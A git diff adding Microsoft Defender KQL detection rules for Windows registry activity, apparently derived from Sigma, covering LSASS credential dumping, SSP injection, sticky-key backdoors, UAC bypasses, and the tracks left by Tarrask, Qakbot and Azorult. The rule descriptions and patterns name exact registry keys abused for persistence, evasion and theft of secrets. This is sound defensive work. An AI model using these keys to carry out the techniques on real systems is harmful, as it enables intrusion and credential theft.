+// Description: Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "SD"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_delete/runmru_registry_key_deletion_registry.kql b/KQL/rules/windows/registry/registry_delete/runmru_registry_key_deletion_registry.kql
new file mode 100644
index 00000000..b7c5713f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_delete/runmru_registry_key_deletion_registry.kql
@@ -0,0 +1,12 @@
+// Title: RunMRU Registry Key Deletion - Registry
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-09-25
+// Level: high
+// Description: Detects attempts to delete the RunMRU registry key, which stores the history of commands executed via the run dialog.
+// In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands.
+// Adversaries may delete this key to cover their tracks after executing commands.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.003
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_delete/terminal_server_client_connection_history_cleared_registry.kql b/KQL/rules/windows/registry/registry_delete/terminal_server_client_connection_history_cleared_registry.kql
new file mode 100644
index 00000000..03fc04ae
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_delete/terminal_server_client_connection_history_cleared_registry.kql
@@ -0,0 +1,10 @@
+// Title: Terminal Server Client Connection History Cleared - Registry
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-10-19
+// Level: high
+// Description: Detects the deletion of registry keys containing the MSTSC connection history
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1070, attack.t1112
+
+DeviceRegistryEvents
+| where (ActionType =~ "DeleteValue" and RegistryKey contains "\\Microsoft\\Terminal Server Client\\Default\\MRU") or ((ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and RegistryKey endswith "\\Microsoft\\Terminal Server Client\\Servers*")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_delete/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql b/KQL/rules/windows/registry/registry_delete/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql
new file mode 100644
index 00000000..983c3ae0
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_delete/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql
@@ -0,0 +1,14 @@
+// Title: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted
+// Author: Sajid Nawaz Khan
+// Date: 2024-06-02
+// Level: medium
+// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value.
+// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
+// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113
+// False Positives:
+//   - Legitimate use/activation of Windows Recall
+
+DeviceRegistryEvents
+| where ActionType =~ "DeleteValue" and RegistryKey endswith "\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/atbroker_registry_change.kql b/KQL/rules/windows/registry/registry_event/atbroker_registry_change.kql
new file mode 100644
index 00000000..20c6db50
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/atbroker_registry_change.kql
@@ -0,0 +1,12 @@
+// Title: Atbroker Registry Change
+// Author: Mateusz Wydra, oscd.community
+// Date: 2020-10-13
+// Level: medium
+// Description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1218, attack.persistence, attack.t1547
+// False Positives:
+//   - Creation of non-default, legitimate at usage
+
+DeviceRegistryEvents
+| where (RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs" or RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") and (not(((RegistryValueData =~ "(Empty)" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\atbroker.exe" and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/cmstp_execution_registry_event.kql b/KQL/rules/windows/registry/registry_event/cmstp_execution_registry_event.kql
new file mode 100644
index 00000000..a8ef67ad
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/cmstp_execution_registry_event.kql
@@ -0,0 +1,12 @@
+// Title: CMSTP Execution Registry Event
+// Author: Nik Seetharaman
+// Date: 2018-07-16
+// Level: high
+// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001
+// False Positives:
+//   - Legitimate CMSTP use (unlikely in modern enterprise environments)
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\cmmgr32.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/creation_of_a_local_hidden_user_account_by_registry.kql b/KQL/rules/windows/registry/registry_event/creation_of_a_local_hidden_user_account_by_registry.kql
new file mode 100644
index 00000000..5911f687
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/creation_of_a_local_hidden_user_account_by_registry.kql
@@ -0,0 +1,10 @@
+// Title: Creation of a Local Hidden User Account by Registry
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-05-03
+// Level: high
+// Description: Sysmon registry detection of a local hidden user account.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1136.001
+
+DeviceRegistryEvents
+| where InitiatingProcessFolderPath endswith "\\lsass.exe" and RegistryKey endswith "\\SAM\\SAM\\Domains\\Account\\Users\\Names*" and RegistryKey endswith "$\\(Default)"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/dll_load_via_lsass.kql b/KQL/rules/windows/registry/registry_event/dll_load_via_lsass.kql
new file mode 100644
index 00000000..01fa09f5
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/dll_load_via_lsass.kql
@@ -0,0 +1,10 @@
+// Title: DLL Load via LSASS
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-16
+// Level: high
+// Description: Detects a method to load DLL via LSASS process using an undocumented Registry key
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1547.008
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt" or RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt") and (not(((RegistryValueData in~ ("%%systemroot%%\\system32\\ntdsa.dll", "%%systemroot%%\\system32\\lsadb.dll")) and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql b/KQL/rules/windows/registry/registry_event/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql
new file mode 100644
index 00000000..5dfcfa6a
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql
@@ -0,0 +1,12 @@
+// Title: Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-11-03
+// Level: medium
+// Description: Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Administrative activity
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\WBEM\\CIMOM\\AllowAnonymousCallback"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/esentutl_volume_shadow_copy_service_keys.kql b/KQL/rules/windows/registry/registry_event/esentutl_volume_shadow_copy_service_keys.kql
new file mode 100644
index 00000000..46e5d83f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/esentutl_volume_shadow_copy_service_keys.kql
@@ -0,0 +1,10 @@
+// Title: Esentutl Volume Shadow Copy Service Keys
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-20
+// Level: high
+// Description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002
+
+DeviceRegistryEvents
+| where (InitiatingProcessFolderPath endswith "esentutl.exe" and RegistryKey contains "System\\CurrentControlSet\\Services\\VSS") and (not(RegistryKey contains "System\\CurrentControlSet\\Services\\VSS\\Start"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/hybridconnectionmanager_service_installation_registry.kql b/KQL/rules/windows/registry/registry_event/hybridconnectionmanager_service_installation_registry.kql
new file mode 100644
index 00000000..1d45be71
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/hybridconnectionmanager_service_installation_registry.kql
@@ -0,0 +1,10 @@
+// Title: HybridConnectionManager Service Installation - Registry
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2021-04-12
+// Level: high
+// Description: Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1608
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Services\\HybridConnectionManager" or (RegistryValueData contains "Microsoft.HybridConnectionManager.Listener.exe" and ActionType =~ "RegistryValueSet")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/narrator_s_feedback_hub_persistence.kql b/KQL/rules/windows/registry/registry_event/narrator_s_feedback_hub_persistence.kql
new file mode 100644
index 00000000..1b8071db
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/narrator_s_feedback_hub_persistence.kql
@@ -0,0 +1,10 @@
+// Title: Narrator's Feedback-Hub Persistence
+// Author: Dmitriy Lifanov, oscd.community
+// Date: 2019-10-25
+// Level: high
+// Description: Detects abusing Windows 10 Narrator's Feedback-Hub
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+
+DeviceRegistryEvents
+| where (ActionType =~ "DeleteValue" and RegistryKey endswith "\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\DelegateExecute") or RegistryKey endswith "\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\(Default)"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/netntlm_downgrade_attack_registry.kql b/KQL/rules/windows/registry/registry_event/netntlm_downgrade_attack_registry.kql
new file mode 100644
index 00000000..ea1a67da
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/netntlm_downgrade_attack_registry.kql
@@ -0,0 +1,12 @@
+// Title: NetNTLM Downgrade Attack - Registry
+// Author: Florian Roth (Nextron Systems), wagga, Nasreddine Bencherchali (Splunk STRT)
+// Date: 2018-03-20
+// Level: high
+// Description: Detects NetNTLM downgrade attack
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1562.001, attack.t1112
+// False Positives:
+//   - Services or tools that set the values to more restrictive values
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "SYSTEM*" and RegistryKey contains "ControlSet" and RegistryKey contains "\\Control\\Lsa") and (((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\lmcompatibilitylevel") or ((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000010)", "DWORD (0x00000020)", "DWORD (0x00000030)")) and RegistryKey endswith "\\NtlmMinClientSec") or RegistryKey endswith "\\RestrictSendingNTLMTraffic")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/new_portproxy_registry_entry_added.kql b/KQL/rules/windows/registry/registry_event/new_portproxy_registry_entry_added.kql
new file mode 100644
index 00000000..0827a45a
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/new_portproxy_registry_entry_added.kql
@@ -0,0 +1,13 @@
+// Title: New PortProxy Registry Entry Added
+// Author: Andreas Hunkeler (@Karneades)
+// Date: 2021-06-22
+// Level: medium
+// Description: Detects the modification of the PortProxy registry key which is used for port forwarding.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, attack.t1090
+// False Positives:
+//   - WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)
+//   - Synergy Software KVM (https://symless.com/synergy)
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Services\\PortProxy\\v4tov4\\tcp*"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/office_application_startup_office_test.kql b/KQL/rules/windows/registry/registry_event/office_application_startup_office_test.kql
new file mode 100644
index 00000000..bc1e9378
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/office_application_startup_office_test.kql
@@ -0,0 +1,12 @@
+// Title: Office Application Startup - Office Test
+// Author: omkar72
+// Date: 2020-10-25
+// Level: medium
+// Description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137.002
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Software\\Microsoft\\Office test\\Special\\Perf"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/path_to_screensaver_binary_modified.kql b/KQL/rules/windows/registry/registry_event/path_to_screensaver_binary_modified.kql
new file mode 100644
index 00000000..0bfb3ba5
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/path_to_screensaver_binary_modified.kql
@@ -0,0 +1,12 @@
+// Title: Path To Screensaver Binary Modified
+// Author: Bartlomiej Czyz @bczyz1, oscd.community
+// Date: 2020-10-11
+// Level: medium
+// Description: Detects value modification of registry key containing path to binary used as screensaver.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.002
+// False Positives:
+//   - Legitimate modification of screensaver
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Control Panel\\Desktop\\SCRNSAVE.EXE" and (not((InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql b/KQL/rules/windows/registry/registry_event/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql
new file mode 100644
index 00000000..df0567dc
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql
@@ -0,0 +1,12 @@
+// Title: Potential Credential Dumping Via LSASS SilentProcessExit Technique
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-02-26
+// Level: critical
+// Description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey contains "Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\lsass.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/potential_qakbot_registry_activity.kql b/KQL/rules/windows/registry/registry_event/potential_qakbot_registry_activity.kql
new file mode 100644
index 00000000..225ea1f1
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/potential_qakbot_registry_activity.kql
@@ -0,0 +1,10 @@
+// Title: Potential Qakbot Registry Activity
+// Author: Hieu Tran
+// Date: 2023-03-13
+// Level: high
+// Description: Detects a registry key used by IceID in a campaign that distributes malicious OneNote files
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Software\\firm\\soft\\Name"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/redmimicry_winnti_playbook_registry_manipulation.kql b/KQL/rules/windows/registry/registry_event/redmimicry_winnti_playbook_registry_manipulation.kql
new file mode 100644
index 00000000..44c1247a
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/redmimicry_winnti_playbook_registry_manipulation.kql
@@ -0,0 +1,10 @@
+// Title: RedMimicry Winnti Playbook Registry Manipulation
+// Author: Alexander Rausch
+// Date: 2020-06-24
+// Level: high
+// Description: Detects actions caused by the RedMimicry Winnti playbook
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey contains "HKLM\\SOFTWARE\\Microsoft\\HTMLHelp\\data"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/registry_entries_for_azorult_malware.kql b/KQL/rules/windows/registry/registry_event/registry_entries_for_azorult_malware.kql
new file mode 100644
index 00000000..d3ba1b1c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/registry_entries_for_azorult_malware.kql
@@ -0,0 +1,10 @@
+// Title: Registry Entries For Azorult Malware
+// Author: Trent Liffick
+// Date: 2020-05-08
+// Level: critical
+// Description: Detects the presence of a registry key created during Azorult execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.execution, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey endswith "SYSTEM*" and RegistryKey endswith "\\services\\localNETService"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/registry_tampering_by_potentially_suspicious_processes.kql b/KQL/rules/windows/registry/registry_event/registry_tampering_by_potentially_suspicious_processes.kql
new file mode 100644
index 00000000..fb18677c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/registry_tampering_by_potentially_suspicious_processes.kql
@@ -0,0 +1,14 @@
+// Title: Registry Tampering by Potentially Suspicious Processes
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-08-13
+// Level: medium
+// Description: Detects suspicious registry modifications made by suspicious processes such as script engine processes such as WScript, or CScript etc.
+// These processes are rarely used for legitimate registry modifications, and their activity may indicate an attempt to modify the registry
+// without using standard tools like regedit.exe or reg.exe, potentially for evasion and persistence.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.execution, attack.t1112, attack.t1059.005
+// False Positives:
+//   - Some legitimate admin or install scripts may use these processes for registry modifications.
+
+DeviceRegistryEvents
+| where InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/run_once_task_configuration_in_registry.kql b/KQL/rules/windows/registry/registry_event/run_once_task_configuration_in_registry.kql
new file mode 100644
index 00000000..157fc1b0
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/run_once_task_configuration_in_registry.kql
@@ -0,0 +1,12 @@
+// Title: Run Once Task Configuration in Registry
+// Author: Avneet Singh @v3t0_, oscd.community
+// Date: 2020-11-15
+// Level: medium
+// Description: Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+//   - Legitimate modification of the registry key by legitimate program
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\Microsoft\\Active Setup\\Installed Components" and RegistryKey endswith "\\StubPath") and (not(((RegistryValueData contains "C:\\Program Files\\Google\\Chrome\\Application\\" and RegistryValueData contains "\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level") or ((RegistryValueData contains "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\" or RegistryValueData contains "C:\\Program Files\\Microsoft\\Edge\\Application\\") and RegistryValueData endswith "\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/security_support_provider_ssp_added_to_lsa_configuration.kql b/KQL/rules/windows/registry/registry_event/security_support_provider_ssp_added_to_lsa_configuration.kql
new file mode 100644
index 00000000..46cb2c04
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/security_support_provider_ssp_added_to_lsa_configuration.kql
@@ -0,0 +1,10 @@
+// Title: Security Support Provider (SSP) Added to LSA Configuration
+// Author: iwillkeepwatch
+// Date: 2019-01-18
+// Level: high
+// Description: Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.005
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Control\\Lsa\\Security Packages" or RegistryKey endswith "\\Control\\Lsa\\OSConfig\\Security Packages") and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\msiexec.exe", "C:\\Windows\\syswow64\\MsiExec.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/shell_open_registry_keys_manipulation.kql b/KQL/rules/windows/registry/registry_event/shell_open_registry_keys_manipulation.kql
new file mode 100644
index 00000000..24917ebc
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/shell_open_registry_keys_manipulation.kql
@@ -0,0 +1,10 @@
+// Title: Shell Open Registry Keys Manipulation
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1546.001
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "\\Software\\Classes\\{" and ActionType =~ "RegistryValueSet" and RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\SymbolicLinkValue") or RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\DelegateExecute" or ((ActionType =~ "RegistryValueSet" and (RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\(Default)" or RegistryKey endswith "Classes\\exefile\\shell\\open\\command\\(Default)")) and (not(RegistryValueData =~ "(Empty)")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/sticky_key_like_backdoor_usage_registry.kql b/KQL/rules/windows/registry/registry_event/sticky_key_like_backdoor_usage_registry.kql
new file mode 100644
index 00000000..a1f334e0
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/sticky_key_like_backdoor_usage_registry.kql
@@ -0,0 +1,12 @@
+// Title: Sticky Key Like Backdoor Usage - Registry
+// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
+// Date: 2018-03-15
+// Level: critical
+// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HelpPane.exe\\Debugger"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/suspicious_camera_and_microphone_access.kql b/KQL/rules/windows/registry/registry_event/suspicious_camera_and_microphone_access.kql
new file mode 100644
index 00000000..4cce5079
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/suspicious_camera_and_microphone_access.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Camera and Microphone Access
+// Author: Den Iuzvyk
+// Date: 2020-06-07
+// Level: high
+// Description: Detects Processes accessing the camera and microphone from suspicious folder
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1125, attack.t1123
+// False Positives:
+//   - Unlikely, there could be conferencing software running from a Temp folder accessing the devices
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore*" and RegistryKey contains "\\NonPackaged") and (RegistryKey contains "microphone" or RegistryKey contains "webcam") and (RegistryKey contains ":#Windows#Temp#" or RegistryKey contains ":#$Recycle.bin#" or RegistryKey contains ":#Temp#" or RegistryKey contains ":#Users#Public#" or RegistryKey contains ":#Users#Default#" or RegistryKey contains ":#Users#Desktop#")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/suspicious_run_key_from_download.kql b/KQL/rules/windows/registry/registry_event/suspicious_run_key_from_download.kql
new file mode 100644
index 00000000..143e8011
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/suspicious_run_key_from_download.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Run Key from Download
+// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poude (Nextron Systems)
+// Date: 2019-10-01
+// Level: high
+// Description: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+//   - Software installers downloaded and used by users
+
+DeviceRegistryEvents
+| where (InitiatingProcessFolderPath contains "\\AppData\\Local\\Packages\\Microsoft.Outlook_" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Olk\\Attachments\\" or InitiatingProcessFolderPath contains "\\Downloads\\" or InitiatingProcessFolderPath contains "\\Temporary Internet Files\\Content.Outlook\\" or InitiatingProcessFolderPath contains "\\Local Settings\\Temporary Internet Files\\") and (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/uac_bypass_via_wsreset.kql b/KQL/rules/windows/registry/registry_event/uac_bypass_via_wsreset.kql
new file mode 100644
index 00000000..0d445fd2
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/uac_bypass_via_wsreset.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Via Wsreset
+// Author: oscd.community, Dmitry Uchakin
+// Date: 2020-10-07
+// Level: high
+// Description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/wdigest_credguard_registry_modification.kql b/KQL/rules/windows/registry/registry_event/wdigest_credguard_registry_modification.kql
new file mode 100644
index 00000000..1ad5897e
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/wdigest_credguard_registry_modification.kql
@@ -0,0 +1,12 @@
+// Title: Wdigest CredGuard Registry Modification
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2019-08-25
+// Level: high
+// Description: Detects potential malicious modification of the property value of IsCredGuardEnabled from
+// HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system.
+// This is usually used with UseLogonCredential to manipulate the caching credentials.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\IsCredGuardEnabled"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/windows_credential_editor_registry.kql b/KQL/rules/windows/registry/registry_event/windows_credential_editor_registry.kql
new file mode 100644
index 00000000..40b58969
